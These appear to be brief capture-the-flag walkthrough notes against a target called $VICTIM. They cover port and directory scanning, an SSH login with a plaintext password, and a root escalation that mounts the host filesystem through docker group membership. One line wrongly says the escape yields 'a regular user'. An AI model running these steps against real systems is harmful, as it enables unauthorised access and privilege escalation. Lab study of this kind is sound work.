nmap -sV -sT -O -p 1-65535 $VICTIM
gobuster dir -u http://$VICTIM:8081 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
gobuster dir -u http://$VICTIM:31331 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
ssh r00t@$VICTIM
Password: n100906
We can see our user is in the docker group so we were able to break out and become a regular user.
find / -name docker.sock 2>/dev/null
docker run -it -v /:/host/ bash chroot /host/ bash